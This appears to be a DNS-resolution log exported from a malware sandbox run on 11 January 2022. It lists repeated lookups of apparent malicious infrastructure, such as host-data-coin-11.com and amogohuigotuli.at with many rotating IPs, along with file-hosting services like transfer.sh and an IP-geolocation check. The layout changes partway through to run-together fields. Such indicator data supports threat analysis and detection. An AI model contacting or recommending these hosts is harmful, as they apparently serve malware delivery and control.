Jan 11, 2022 20:44:05.042123079 CET | 8.8.8.8 | 192.168.2.4 | 0xb4c3 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:05.321938038 CET | 8.8.8.8 | 192.168.2.4 | 0x4763 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:07.750276089 CET | 8.8.8.8 | 192.168.2.4 | 0xf243 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:08.276881933 CET | 8.8.8.8 | 192.168.2.4 | 0x61fa | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:08.539293051 CET | 8.8.8.8 | 192.168.2.4 | 0x948e | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:08.783509970 CET | 8.8.8.8 | 192.168.2.4 | 0x985f | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:08.783509970 CET | 8.8.8.8 | 192.168.2.4 | 0x985f | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:08.783509970 CET | 8.8.8.8 | 192.168.2.4 | 0x985f | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:08.783509970 CET | 8.8.8.8 | 192.168.2.4 | 0x985f | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:08.783509970 CET | 8.8.8.8 | 192.168.2.4 | 0x985f | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:12.618890047 CET | 8.8.8.8 | 192.168.2.4 | 0xa882 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:13.877335072 CET | 8.8.8.8 | 192.168.2.4 | 0x9841 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:14.111532927 CET | 8.8.8.8 | 192.168.2.4 | 0x448a | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:26.607369900 CET | 8.8.8.8 | 192.168.2.4 | 0x8b01 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:26.607369900 CET | 8.8.8.8 | 192.168.2.4 | 0x8b01 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:26.607369900 CET | 8.8.8.8 | 192.168.2.4 | 0x8b01 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:26.607369900 CET | 8.8.8.8 | 192.168.2.4 | 0x8b01 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:26.607369900 CET | 8.8.8.8 | 192.168.2.4 | 0x8b01 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:26.607369900 CET | 8.8.8.8 | 192.168.2.4 | 0x8b01 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:29.413784027 CET | 8.8.8.8 | 192.168.2.4 | 0x96fc | No error (0) | patmushta.info | | 8.209.79.15 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:35.718924046 CET | 8.8.8.8 | 192.168.2.4 | 0xaff2 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:35.965981007 CET | 8.8.8.8 | 192.168.2.4 | 0xb2a8 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.251482010 CET | 8.8.8.8 | 192.168.2.4 | 0xc05f | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.377810955 CET | 8.8.8.8 | 192.168.2.4 | 0x5388 | Server failure (2) | srtuiyhuali.at | none | none | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.509876966 CET | 8.8.8.8 | 192.168.2.4 | 0xc60 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.757941961 CET | 8.8.8.8 | 192.168.2.4 | 0xbc11 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 5.163.255.148 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 175.119.10.231 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 116.58.10.58 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 211.119.84.111 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 189.165.15.160 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 190.43.145.172 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 118.33.109.122 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.939147949 CET | 8.8.8.8 | 192.168.2.4 | 0x6054 | No error (0) | amogohuigotuli.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:36.988843918 CET | 8.8.8.8 | 192.168.2.4 | 0xd877 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:37.209645987 CET | 8.8.8.8 | 192.168.2.4 | 0xb938 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:37.715781927 CET | 8.8.8.8 | 192.168.2.4 | 0xa0f5 | No error (0) | data-host-coin-8.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 175.119.10.231 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 116.58.10.58 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 211.119.84.111 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 189.165.15.160 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 190.43.145.172 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 118.33.109.122 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 5.163.255.148 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:38.797524929 CET | 8.8.8.8 | 192.168.2.4 | 0xa33f | No error (0) | amogohuigotuli.at | | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:40.719554901 CET | 8.8.8.8 | 192.168.2.4 | 0x727 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:40.927947998 CET | 8.8.8.8 | 192.168.2.4 | 0x4752 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:41.162457943 CET | 8.8.8.8 | 192.168.2.4 | 0x26db | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:41.369647026 CET | 8.8.8.8 | 192.168.2.4 | 0x28f2 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:41.590332985 CET | 8.8.8.8 | 192.168.2.4 | 0x17c6 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:41.810193062 CET | 8.8.8.8 | 192.168.2.4 | 0x6252 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:42.030425072 CET | 8.8.8.8 | 192.168.2.4 | 0xce66 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:42.246131897 CET | 8.8.8.8 | 192.168.2.4 | 0xbbc7 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:42.484822989 CET | 8.8.8.8 | 192.168.2.4 | 0x4694 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:42.714019060 CET | 8.8.8.8 | 192.168.2.4 | 0xe569 | No error (0) | goo.su | | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:42.714019060 CET | 8.8.8.8 | 192.168.2.4 | 0xe569 | No error (0) | goo.su | | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:43.231197119 CET | 8.8.8.8 | 192.168.2.4 | 0xdce1 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:43.467884064 CET | 8.8.8.8 | 192.168.2.4 | 0x11eb | No error (0) | goo.su | | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:43.467884064 CET | 8.8.8.8 | 192.168.2.4 | 0x11eb | No error (0) | goo.su | | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:44.694936991 CET | 8.8.8.8 | 192.168.2.4 | 0xf098 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:44.918253899 CET | 8.8.8.8 | 192.168.2.4 | 0x469c | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:45.091128111 CET | 8.8.8.8 | 192.168.2.4 | 0x968e | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:45.337661028 CET | 8.8.8.8 | 192.168.2.4 | 0x4cd8 | No error (0) | softwaresworld.net | | 94.102.49.170 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 175.119.10.231 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 116.58.10.58 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 211.119.84.111 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 189.165.15.160 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 190.43.145.172 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 118.33.109.122 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:47.302603006 CET | 8.8.8.8 | 192.168.2.4 | 0x96b0 | No error (0) | amogohuigotuli.at | | 5.163.255.148 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.158341885 CET | 8.8.8.8 | 192.168.2.4 | 0x4c6b | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.385624886 CET | 8.8.8.8 | 192.168.2.4 | 0x644e | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 118.33.109.122 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 5.163.255.148 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 110.14.121.125 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 175.119.10.231 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 116.58.10.58 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 211.119.84.111 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 189.165.15.160 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET | 8.8.8.8 | 192.168.2.4 | 0x897f | No error (0) | amogohuigotuli.at | | 190.43.145.172 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.626151085 CET | 8.8.8.8 | 192.168.2.4 | 0x5846 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:51.855132103 CET | 8.8.8.8 | 192.168.2.4 | 0xe8cb | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:52.115396023 CET | 8.8.8.8 | 192.168.2.4 | 0xb87c | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:52.333758116 CET | 8.8.8.8 | 192.168.2.4 | 0xc88 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:52.541667938 CET | 8.8.8.8 | 192.168.2.4 | 0x41c4 | No error (0) | host-data-coin-11.com | | 5.188.88.184 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:52.778362989 CET | 8.8.8.8 | 192.168.2.4 | 0xe014 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:52.907128096 CET | 8.8.8.8 | 192.168.2.4 | 0x8a31 | No error (0) | unic11m.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:52.972795963 CET | 8.8.8.8 | 192.168.2.4 | 0x7974 | No error (0) | amogohuigotuli.at | | 61.98.7.133 | A (IP address) | IN (0x0001)
Jan 11, 2022 20:44:52.972795963 CET | 8.8.8.8 | 192.168.2.4 | 0x7974 | No error (0) | amogohuigotuli.at | | 118.33.109.122 | A (IP address) | IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.793574095 CET8.8.8.8192.168.2.40xe54aNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.798122883 CET8.8.8.8192.168.2.40x1c9eNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.027518988 CET8.8.8.8192.168.2.40xdfe7No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.270229101 CET8.8.8.8192.168.2.40x4246No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.315061092 CET8.8.8.8192.168.2.40x6942No error (0)noc.social149.28.78.238A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.101553917 CET8.8.8.8192.168.2.40x7995No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.325273991 CET8.8.8.8192.168.2.40xee0bNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.544269085 CET8.8.8.8192.168.2.40x89f2No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.544269085 CET8.8.8.8192.168.2.40x89f2No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.744601965 CET8.8.8.8192.168.2.40x8187No error (0)github.com140.82.121.3A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.886451960 CET8.8.8.8192.168.2.40x91c8No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:02.115704060 CET8.8.8.8192.168.2.40xc1c2No error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:04.023781061 CET8.8.8.8192.168.2.40x47e1No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.234123945 CET8.8.8.8192.168.2.40x10dfNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.560168982 CET8.8.8.8192.168.2.40x630fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:07.762454033 CET8.8.8.8192.168.2.40x3fNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
